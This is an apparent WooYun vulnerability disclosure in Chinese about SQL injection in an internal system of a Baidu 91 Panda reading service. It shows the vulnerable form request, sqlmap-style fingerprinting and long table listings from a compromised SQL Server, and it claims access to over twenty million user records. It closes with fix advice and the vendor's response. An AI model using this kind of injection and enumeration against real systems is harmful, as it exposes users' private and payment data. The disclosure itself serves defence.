/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_Value"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_SelIndex"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex
"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundarydEuFUCx2QXyzCtlV--
---
[00:58:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

漏洞证明:

看下数据库:

数据库.png


数据库数据项数:

Database: NovelDB2_Slave
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.Novel_MyAttention | 35657862 |
| dbo.PandaCoinOrder_BulkPayChapter_2016 | 20784845 |
| dbo.T_PandaUserLatestAction | 19243579 |
| dbo.AttachBookTbl | 7688792 |
| dbo.PandaCoinConvert | 6750304 |
| dbo.PandaCoinConvert_2012 | 2043063 |
| dbo.Novel_Book_2013BACK | 126188 |
| dbo.BookProperty | 118765 |
| dbo.Cosimple_PandaPartnersPriceStatis | 93504 |
| dbo.BookKeysTbl | 83572 |
| dbo.Novel_Book | 47889 |
| dbo.v_NovelBooks | 35172 |
| dbo.BookTag | 34397 |
| dbo.PandaBulkShopProduct | 9716 |
| dbo.Novel_BookCategory | 2452 |
| dbo.Cartoon | 1519 |
| dbo.CartoonCategory | 1098 |
| dbo.BookTagRelation | 435 |
| dbo.MSreplication_objects | 51 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
+------------------------------------------------------------+---------+
Database: msdb
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.backupfile | 204582 |
| dbo.backupmediafamily | 6127 |
| dbo.backupmediaset | 6127 |
| dbo.backupset | 6127 |
| dbo.restorefile | 240 |
| dbo.restorefilegroup | 236 |
| dbo.restorehistory | 4 |
+------------------------------------------------------------+---------+
Database: master
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| sys.messages | 99632 |
| sys.sysmessages | 99632 |
| sys.syscolumns | 10759 |
| sys.all_parameters | 6761 |
| sys.system_parameters | 6761 |
| sys.trace_subclass_values | 4729 |
| sys.trace_event_bindings | 3965 |
| sys.all_columns | 3793 |
| sys.system_columns | 3749 |
| sys.syscomments | 2793 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1779 |
| sys.sysobjects | 1779 |
| sys.system_objects | 1773 |
| sys.database_permissions | 1675 |
| sys.syspermissions | 1675 |
| sys.sysprotects | 1674 |
| sys.all_sql_modules | 1621 |
| sys.system_sql_modules | 1621 |
| sys.all_views | 286 |
| sys.system_views | 286 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 99 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.configurations | 65 |
| sys.sysconfigures | 65 |
| sys.syscurconfigs | 65 |
| sys.trace_columns | 65 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.fulltext_languages | 17 |
| sys.xml_schema_component_placements | 17 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.database_principals | 14 |
| sys.schemas | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.database_mirroring | 12 |
| sys.database_recovery_status | 12 |
| sys.databases | 12 |
| sys.sysdatabases | 12 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.servers | 4 |
| sys.sysservers | 4 |
| sys.service_queue_usages | 3 |
| sys.stats | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+------------------------------------------------------------+---------+
Database: PandaPublisher
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.Panda_PublisherLog | 4772444 |
| dbo.PandaBlockIMEI | 797150 |
| dbo.Panda_PushInfo | 136358 |
| dbo.AttachmentIMEI | 58188 |
| dbo.ChnApkBook_UploadManager | 26894 |
| dbo.ChapterTakeInfoLog | 9896 |
| dbo.ApkBook_UploadManager | 9517 |
| dbo.ApkBookManager | 9386 |
| dbo.Adver_UserCredit | 6061 |
| dbo.syncobj_0x3339453141353846 | 6061 |
| dbo.ChapterToBlock | 2805 |
| dbo.V_PandaChapterBookInfo | 2768 |
| dbo.ChapterRcContent | 2767 |
| dbo.PandaChapterManager | 2767 |
| dbo.PandaChapterRcManager | 2767 |
| dbo.ChapterContent | 2766 |
| dbo.V_PandaChapterBookInfo_New | 2696 |
| dbo.ApkBook_NoExitsPackageLogs | 1992 |
| dbo.PandaUpdate_VersionCpManager | 1646 |
| dbo.ApkBook_UploadManager_bak | 1000 |
| dbo.Adver_AdverOfferPriceLog | 513 |
| dbo.ChapterToBlock_Back | 370 |
| dbo.Adver_AdverFocusLog | 309 |
| dbo.BookAttachmentManager | 277 |
| dbo.PandaChapterRcManager_Bak | 275 |
| dbo.ChapterRcContent_Bak | 274 |
| dbo.Panda_PublisherInterface | 79 |
| dbo.Adver_AdverManger | 47 |
| dbo.syncobj_0x4434374643323037 | 47 |
| dbo.PandaBlockManager | 46 |
| dbo.Adver_UserCreaditConsumLog | 36 |
| dbo.ChnApkBook_UploadBatchManger | 33 |
| dbo.AttachmentManager | 30 |
| dbo.sysarticlecolumns | 21 |
| dbo.PandaUpdate_UpdateRulesManager | 18 |
| dbo.PandaUpdate_RuleToAttachment | 13 |
| dbo.ApkBookManager_bak | 11 |
| dbo.Adver_AuctionStagesManger | 10 |
| dbo.syncobj_0x3646344539434238 | 10 |
| dbo.BlockType | 8 |
| dbo.Adver_AdverPosType | 7 |
| dbo.ApkBook_VersionManager | 6 |
| dbo.syssubscriptions | 6 |
| dbo.Tool_TakeBlockDataCfg | 6 |
| dbo.ApkBook_AttachmentManager | 5 |
| dbo.Adver_AdverPosManger | 4 |
| dbo.ChnApkBook_ChnCfg | 3 |
| dbo.sysarticles | 3 |
| dbo.sysextendedarticlesview | 3 |
| dbo.PandaUpdate_Plist | 2 |
| dbo.PricesManager | 2 |
| dbo.ApkBook_VersionToAttachment | 1 |
| dbo.syspublications | 1 |
| dbo.sysreplservers | 1 |
+------------------------------------------------------------+---------+
Database: PandaStat
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.PandaRewardValue | 139843999 |
| dbo.T_PandaUserRecommandStat_New | 40496503 |
| dbo.PandaCoinOrder_Release_Report_New | 40327364 |
| dbo.ReaderHeroUserCount | 23092234 |
| dbo.ReaderHero_2013 | 22918893 |
| dbo.Shelf_ResourceRelation | 21850695 |
| dbo.T_PandaUserMessage_Filter_UID | 17829829 |
| dbo.PandaUserSign | 14205059 |
| dbo.ReaderHero | 11103386 |
| dbo.PandaUserPriceSummary | 10444487 |
| dbo.Boss_PandaActiveUID | 8752728 |
| dbo.Sync_FileResource | 6152073 |
| dbo.PandaUserPriceSummary_Back | 6123970 |
| dbo.ShakeShare_RecordLog | 6109962 |
| dbo.Boss_RecommendReadHistory | 5522330 |
| dbo.ShakeShare_RecordLog_2013_BACK | 4959847 |
| dbo.Baidu_PushMessage | 4572817 |
| dbo.PandaRewardValue_WeiXin | 3794336 |
| dbo.Boss_Baidu91ShopContent | 3711242 |
| dbo.Boss_PandaMessageFilterUser_Back | 2554602 |
| dbo.ShakeShare_RecordLog_2013 | 1916064 |
| dbo.PandaFlowerValue | 1690595 |
| dbo.ShakeShare_User | 1642429 |
| dbo.Baidu_PushUser_201505 | 1357381 |
| dbo.Baidu_PushUser_201506 | 1357321 |
| dbo.Baidu_PushUser_201504 | 1357229 |
| dbo.Baidu_PushUser_201503 | 1349044 |
| dbo.Baidu_PushUser_201507 | 1338837 |
| dbo.Shelf_Book | 1288454 |
| dbo.Baidu_PushUser_201508 | 1247541 |
| dbo.Baidu_PushUser_201509 | 1231954 |
| dbo.ShakeShare_Record_2013 | 1212188 |
| dbo.PandaPushMessage | 1165947 |
| dbo.PandaEggValue | 1124287 |
| dbo.ShakeShare_Record | 867040 |
| dbo.T_PandaHotSearch_201507 | 836465 |
| dbo.T_PandaHotSearch_201506 | 794212 |
| dbo.Baidu_PushUser_201502 | 776096 |
| dbo.T_PandaHotSearch_201508 | 770497 |
| dbo.Baidu_PushUser_201510 | 753329 |
| dbo.Boss_PandaUserMacToken_201407 | 702283 |
| dbo.T_PandaHotSearch_201505 | 688294 |
| dbo.T_PandaHotSearch_201503 | 685133 |
| dbo.T_PandaHotSearch_201504 | 682911 |
| dbo.Boss_PandaUserMacToken_201406 | 668902 |
| dbo.Boss_PandaUserMacToken_201408 | 667242 |
| dbo.T_PandaHotSearch_201509 | 650774 |
| dbo.Boss_PandaUserMacToken | 639823 |
| dbo.Boss_PandaUserMacToken_201309 | 617232 |
| dbo.Boss_PandaUserMacToken_201409 | 616750 |
| dbo.PandaMonthTicket | 615053 |
| dbo.PandaPushMessage0610 | 597339 |
| dbo.Boss_PandaUserMacToken_201410 | 589402 |
| dbo.Boss_PandaMulityWMLAuto | 562423 |
| dbo.T_PandaHotSearch_201510 | 543463 |
| dbo.Boss_PandaUserMacToken_201405 | 529042 |
| dbo.Boss_PandaUserMacToken_201411 | 525432 |
| dbo.Boss_PandaUserMacToken_201502 | 506896 |
| dbo.Boss_PandaUserMacToken_201412 | 488224 |
| dbo.UrgeUpdatePandaCoin | 462389 |
| dbo.Boss_PandaUserMacToken_201501 | 458424 |
| dbo.Boss_PandaUserMacToken_201308 | 435169 |
| dbo.Boss_PandaUserMacToken_201503 | 432992 |
| dbo.Novel_BookFileToFtp | 419103 |
| dbo.Boss_PandaUserMacToken_201504 | 400777 |
| dbo.T_PandaUserMessage | 400747 |
| dbo.Boss_PandaRootPageRecommend_History | 396066 |
| dbo.Boss_PandaUserMacToken_201505 | 385159 |
| dbo.Boss_PandaUserMacToken_201506 | 378259 |
| dbo.Boss_PandaUserMacToken_201507 | 373561 |
| dbo.Boss_PandaUserMacToken_201510 | 351302 |
| dbo.Boss_PandaUserMacToken_201508 | 344976 |
| dbo.Boss_PandaUserMacToken_201509 | 342709 |
| dbo.Boss_PandaUserMacToken_201511 | 334753 |
| dbo.Boss_ActionEntrySTAT | 313590 |
| dbo.Baidu_PushUser_201511 | 290244 |
| dbo.pandalog_0224 | 284551 |
| dbo.ShakeShare_ResourceRelation | 278005 |
| dbo.T_PandaResStat | 259340 |
| dbo.PandaCoinOrder_BdPay_Receipt | 243646 |
| dbo.PC_MyReadHistory | 214728 |
| dbo.ZhuShou_PandaCoinOrder | 213120 |
| dbo.T_PandaHotSearch_201511 | 187771 |
| dbo.PandaUserGiftCoin_Log | 174225 |
| dbo.ReaderHeroTypeCheck | 164161 |
| dbo.Boss_PandaBookMacToken | 159591 |
| dbo.T_PandaResStat_03 | 132199 |
| dbo.PandaRewardTicketComment | 131890 |
| dbo.Boss_BatchDetails | 129876 |
| dbo.PandaMonthTicketComment | 129395 |
| dbo.Boss_PandaUserMacToken_201512 | 126022 |
| dbo.Boss_PandaChapterInfo | 118026 |
| dbo.Boss_PandaRootPageRecommendUser | 104200 |
| dbo.Boss_PandaMessageFilterUser | 95771 |
| dbo.T_PandaResStat_Back | 88961 |
| dbo.T_PandaUserAction | 77638 |
| dbo.T_PandaUserAction_ForInsert | 77638 |
| dbo.T_PandaUserAction_Back | 75534 |
| dbo.T_PandaUserAction_bak20150112 | 66395 |
| dbo.Boss_ChannelIMEI | 64735 |
| dbo.UrgeUpdateDetail | 63297 |
| dbo.ShakeShare_UserOnLine | 62448 |
| dbo.T_PandaResUpdateLength_Stat | 61439 |
| dbo.Baidu_PushUser_201512 | 60344 |
| dbo.PandaNotesComment | 53789 |
| dbo.Boss_PandaBookGUID | 33862 |
| dbo.Boss_UserShareSinaHistory | 32197 |
| dbo.PandaCoinOrder_AppStore_Report | 27843 |
| dbo.PC_MyPageFavorites | 26461 |
| dbo.FileResourceMd5 | 24278 |
| dbo.UrgeUpdateUser | 22712 |
| dbo.T_ProductFeedBackLog | 22624 |
| dbo.PandaMonthTicketComment_2015 | 22421 |
| dbo.ReaderHeroClickCount | 22244 |
| dbo.Boss_ResourceTimer | 18249 |
| dbo.Boss_AppDownloadHistory | 17208 |
| dbo.Boss_PandaBulkShopMonthly | 16887 |
| dbo.T_PandaResStat20150112 | 15000 |
| dbo.Boss_BatchHistory | 11823 |
| dbo.T_PandaHotSearch_201512 | 8858 |
| dbo.TencentAccessToken | 7846 |
| dbo.Boss_UserShareSinaStat | 7672 |
| dbo.PandaWeiXinShare | 7045 |
| dbo.PandaAllBookGuid | 4897 |
| dbo.T_PandaRes_TagEnum | 3891 |
| dbo.T_PandaResUpdateLength_Stat_BACK2 | 3468 |
| dbo.T_PandaResUpdateLength_Stat_BACK | 3327 |
| dbo.T_PandaUserMessageUID | 1852 |
| dbo.PandaSndaUID | 1720 |
| dbo.Boss_BatchWeiXin | 1261 |
| dbo.T_PandaRes_SystemMessage | 707 |
| dbo.T_PandaRes_SystemMessage150207 | 660 |
| dbo.Boss_PandaBulkShopProductHistory | 586 |
| dbo.Boss_PandaActivityFlow | 141 |
| dbo.PandaPushMessage_V2 | 93 |
| dbo.Boss_PandaSiteConfig | 91 |
| dbo.Boss_PandaAdvertisement | 80 |
| dbo.PandaStatEnum | 74 |
| dbo.Boss_PandaRewardUser | 71 |
| dbo.Boss_NameValues | 58 |
| dbo.PandaFriendUrl | 42 |
| dbo.T_PandaUserMessage_Filter | 35 |
| dbo.Boss_BatchList | 31 |
| dbo.Baidu_PushUser_201501 | 26 |
| dbo.Boss_PandaRootPageRecommend | 26 |
| dbo.Boss_AppRecommend | 11 |
| dbo.Boss_SysUser | 10 |
| dbo.Boss_SearchWordInfo | 9 |
| dbo.PandaUserSign_WeiXin | 6 |
| dbo.Boss_PandaInitRecommend | 5 |
| dbo.Boss_BookshelfAdvert | 3 |
| dbo.Boss_PandaMulityWML | 3 |
| dbo.Boss_PandaNovelRegather | 2 |
| dbo.T_PandaResStatModify | 2 |
| dbo.Boss_PandaActivity | 1 |
| dbo.Boss_PandaReward | 1 |
+------------------------------------------------------------+---------+
Database: CommentDB
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.Comment | 1377900 |
| dbo.Comment_Back | 614514 |
| dbo.UserCommentStat | 491662 |
| dbo.CommentUpVoteHistory | 170356 |
| dbo.CommentUpVote | 170227 |
| dbo.ResourceCommentStat | 118239 |
| dbo.CommentStat | 59973 |
| dbo.ChapterUpVote | 16583 |
| dbo.ChapterUpVoteHistory | 16583 |
| dbo.CommentReward | 10093 |
| dbo.ChapterStat | 2964 |
| dbo.BlackList | 2456 |
| dbo.FilterWords | 2253 |
| dbo.CommentRewardCoinStat | 1731 |
| dbo.ChapterReward | 206 |
| dbo.T_BlackList | 1 |
| dbo.T_FilterWords | 1 |
+------------------------------------------------------------+---------+
Database: EBookDB_Slave
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.BookChapters | 1550102 |
| dbo.ZineJournalPages | 1378795 |
| dbo.v_TagResources | 50531 |
| dbo.BookPrices | 47410 |
| dbo.BookTagRelation | 37721 |
| dbo.v_TagBooks | 37510 |
| dbo.Books | 26382 |
| dbo.v_Books | 26382 |
| dbo.BookTags | 25986 |
| dbo.v_TagJournals | 13021 |
| dbo.ZineJournalTagRelation | 13021 |
| dbo.v_FullZines | 7976 |
| dbo.v_Journals | 7976 |
| dbo.ZineJournals | 7976 |
| dbo.ZineJournalPrices | 2796 |
| dbo.BookCategories | 1211 |
| dbo.Publishers | 966 |
| dbo.ZineJournalTags | 572 |
| dbo.v_Zines | 529 |
| dbo.Zines | 529 |
| dbo.UserGroups | 256 |
| dbo.MSreplication_objects | 45 |
| dbo.ZineCategories | 41 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
+------------------------------------------------------------+---------+
Database: AuthorDB
+------------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------------+---------+
| dbo.PandaReport_AuthorNovelStat_AllNovel | 4543829 |
| dbo.PandaAdmin_NovelDailySaleTotalAll | 4224946 |
| dbo.PandaReport_AuthorNovelMonthStat_bak | 3439361 |
| dbo.PandaAdmin_NovelDailySaleTotalAll_bak20140919 | 2686687 |
| dbo.PandaReport_AuthorUserScaleMerge_bak | 2081373 |
| dbo.PandaAdmin_AttendanceMonth_bak | 960896 |
| dbo.PandaAdmin_AuthorNovelChapter | 558957 |
| dbo.PandaReport_AuthorNovelChapterSale | 537130 |
| dbo.PandaReport_AuthorNovelChapterSale_201511 | 532436 |
| dbo.PandaReport_AuthorNovelChapterSale_201510 | 521006 |
| dbo.PandaReport_AuthorNovelChapterSale_201509 | 507699 |
| dbo.PandaReport_AuthorNovelChapterSale_201508 | 493875 |
| dbo.PandaReport_AuthorNovelChapterSale_201507 | 479165 |
| dbo.PandaReport_AuthorNovelChapterSale_201506 | 462092 |
| dbo.PandaReport_AuthorNovelStat | 454284 |
| dbo.PandaReport_AuthorNovelChapterSale_201505 | 444270 |
| dbo.PandaReport_AuthorNovelChapterSale_20140924 | 433891 |
| dbo.PandaReport_AuthorNovelChapterSale_201408 | 430993 |
| dbo.PandaAdmin_NovelDailySaleTotal | 423929 |
| dbo.PandaReport_AuthorNovelChapterSale_201407 | 421855 |
| dbo.PandaReport_AuthorNovelChapterSale_201504 | 420035 |
| dbo.PandaReport_AuthorNovelChapterSale_201406 | 410368 |
| dbo.PandaReport_AuthorNovelChapterSale_201503 | 397221 |
| dbo.PandaReport_AuthorNovelChapterSale_201405 | 395477 |
| dbo.PandaReport_AuthorNovelChapterSale_201502 | 392026 |
| dbo.PandaReport_AuthorNovelChapterSale_201412 | 391931 |
| dbo.PandaReport_AuthorNovelChapterSale_201501 | 390408 |
| dbo.PandaReport_AuthorNovelChapterSale_201411 | 388938 |
| dbo.PandaReport_AuthorNovelChapterSale_201404 | 387568 |
| dbo.PandaReport_AuthorNovelChapterSale_201410 | 385141 |
| dbo.PandaReport_AuthorNovelChapterSale_201409 | 381735 |
| dbo.PandaReport_AuthorNovelChapterSale_201403 | 377520 |
| dbo.PandaReport_AuthorNovelChapterSale_20140928 | 372945 |
| dbo.PandaReport_AuthorNovelChapterSale_201402 | 356846 |
| dbo.PandaReport_AuthorNovelChapterSale_Back2 | 356846 |
| dbo.PandaReport_AuthorNovelChapterSale_Back | 355728 |
| dbo.PandaReport_AuthorNovelChapterSale_201401 | 338792 |
| dbo.PandaAdmin_AttendanceRecOrder | 320403 |
| dbo.PandaReport_AuthorNovelChapterSale_201312 | 313496 |
| dbo.PandaReport_AuthorNovelChapterSale_201311 | 288820 |
| dbo.PandaReport_AuthorNovelChapterSale_201310 | 260636 |
| dbo.PandaAdmin_AttendanceSendOrder | 255781 |
| dbo.PandaReport_AuthorNovelChapterSale_201309 | 237684 |
| dbo.PandaReport_AuthorNovelChapterSale_201308 | 211072 |
| dbo.PandaReport_AuthorNovelChapterSale_201307 | 180853 |
| dbo.PandaAdmin_AttendanceDay | 120706 |
| dbo.PandaAdmin_NovelDailySaleTotal_Bak20131209 | 110531 |
| dbo.PandaReport_AuthorNovelChapterSale_201306 | 109069 |
| dbo.PandaReport_AuthorNovelChapterSale_201305 | 89497 |
| dbo.PandaReport_AuthorNovelChapterSale_201304 | 75419 |
| dbo.PandaAdmin_ChapterTemp | 66334 |
| dbo.PandaReport_AuthorNovelChapterSale_201303 | 64974 |
| dbo.PandaAdmin_AuthorMailBox | 64676 |
| dbo.PandaReport_AuthorNovelChapterSale_201302 | 56642 |
| dbo.PandaUploadBookManager | 51121 |
| dbo.PandaReport_AuthorNovelMonthStat | 31763 |
| dbo.PandaAdmin_AttendanceError | 29506 |
| dbo.PandaReport_AuthorUserScaleMerge | 20682 |
| dbo.PandaAdmin_AttendanceMonth | 19692 |
| dbo.PandaReport_AuthorNovelMonthStat_bak20140521 | 17256 |
| dbo.PandaReport_AuthorUserScaleMerge_bak20140521 | 10360 |
| dbo.aspnet_Membership | 10312 |
| dbo.aspnet_Users | 10312 |
| dbo.vw_aspnet_MembershipUsers | 10312 |
| dbo.vw_aspnet_Users | 10312 |
| dbo.aspnet_Membership_1507 | 10264 |
| dbo.aspnet_Users_150730 | 10264 |
| dbo.PandaReport_AuthorNovelMonthStat_bak20131223 | 10046 |
| dbo.PandaReport_AuthorNovelMonthStat_bak20131220 | 8277 |
| dbo.PandaReport_AuthorUserScaleMerge_bak20131223 | 6009 |
| dbo.PandaAdmin_AuthorUser | 5791 |
| dbo.PandaAdmin_AuthorUserScale | 5783 |
| dbo.PandaSingleApp | 5752 |
| dbo.aspnet_UsersInRoles_1507 | 5182 |
| dbo.aspnet_UsersInRoles | 5132 |
| dbo.vw_aspnet_UsersInRoles | 5132 |
| dbo.PandaReport_AuthorUserScaleMerge_bak20131220 | 4933 |
| dbo.PandaAdmin_AttendanceMonth_bak20140521 | 4703 |
| dbo.PandaAdmin_AuthorNovelBook | 4375 |
| dbo.PandaAdmin_AuthorNovelHandle | 4353 |
| dbo.PandaReport_AuthorUserArrearsAdvertisement_bak | 3981 |
| dbo.PandaAdmin_UpdateBookContentLog | 3976 |
| dbo.PandaAdmin_AuthorNovelBook_20140310 | 3577 |
| dbo.PandaAdmin_BookUrls | 2852 |
| dbo.PandaAdmin_ChapterIllegal | 2059 |
| dbo.PandaAdmin_AuthorNovelBookMessage | 1903 |
| dbo.PandaAdmin_AuthorNovelVolume | 1834 |
| dbo.PandaAdmin_AuthorRecomment | 1679 |
| dbo.PandaAdmin_AttendanceMonth_bak20131223 | 1261 |
| dbo.PandaAdmin_BookMessageSendState | 886 |
| dbo.PandaAdmin_AuthorUserBank | 636 |
| dbo.Panda_CompanyToBook | 585 |
| dbo.PandaReport_AuthorUserScaleMergeDetail | 320 |
| dbo.PandaReport_AuthorUserScaleMergeBack | 296 |
| dbo.PandaReport_AuthorUserScale | 211 |
| dbo.PandaAdmin_BookContract | 200 |
| dbo.PandaWeixin_DraftBox | 180 |
| dbo.PandaWeixin_UserIdToOperateId | 86 |
| dbo.PandaAdmin_AuthorNovelBookProxy | 24 |
| dbo.PandaReport_AuthorUserArrearsAdvertisement | 21 |
| dbo.PandaReport_AuthorUserArrearsAdvertisement_bak20140521 | 21 |
| dbo.PandaAdmin_ViewConfig | 15 |
| dbo.Publish_Company | 8 |
| dbo.PandaAdmin_UserGroup | 7 |
| dbo.aspnet_SchemaVersions | 6 |
| dbo.PandaAdmin_AttendanceParam | 6 |
| dbo.ext_ObjectMetadata | 4 |
| dbo.PandaAdmin_Announcement | 3 |
| dbo.aspnet_Organizations | 2 |
| dbo.aspnet_Applications | 1 |
| dbo.aspnet_OrganizationTypes | 1 |
| dbo.aspnet_Roles | 1 |
| dbo.PandaAdmin_AuthorInterview | 1 |
| dbo.vw_aspnet_Applications | 1 |
| dbo.vw_aspnet_Roles | 1 |
| dbo.查询 | 1 |
+------------------------------------------------------------+---------+


两千多万用户信息

111.png

修复方案:

1、建议统一排查下弱口令
2、内部系统注入不少,建议完整性自查一遍
2、给系统加个waf等安全防护软件

版权声明:转载请注明来源 Looke@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-03 11:01

厂商回复:

感谢,转百度91修复

最新状态:

暂无


漏洞评价:

评价